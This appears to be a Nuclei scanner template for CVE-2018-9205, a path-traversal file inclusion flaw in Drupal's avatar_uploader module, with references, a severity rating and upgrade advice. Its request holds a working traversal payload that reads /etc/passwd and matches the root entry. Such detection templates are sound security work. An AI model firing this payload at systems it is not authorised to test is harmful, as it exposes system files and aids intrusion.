id: CVE-2018-9205 info: name: Drupal avatar_uploader v7.x-1.0-beta8 - Local File Inclusion author: daffainfo severity: high description: In avatar_uploader v7.x-1.0-beta8 the view.php program doesn't restrict file paths, allowing unauthenticated users to retrieve arbitrary files. reference: - https://www.exploit-db.com/exploits/44501 - https://nvd.nist.gov/vuln/detail/CVE-2018-9205 - https://www.drupal.org/project/avatar_uploader/issues/2957966 - https://www.drupal.org/project/avatar_uploader remediation: Upgrade to the latest version of avatar_uploader. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2018-9205 cwe-id: CWE-22 tags: cve,cve2018,lfi,drupal requests: - method: GET path: - "{{BaseURL}}/sites/all/modules/avatar_uploader/lib/demo/view.php?file=../../../../../../../../../../../etc/passwd" matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" - type: status status: - 200 # Enhanced by cs on 2022/02/25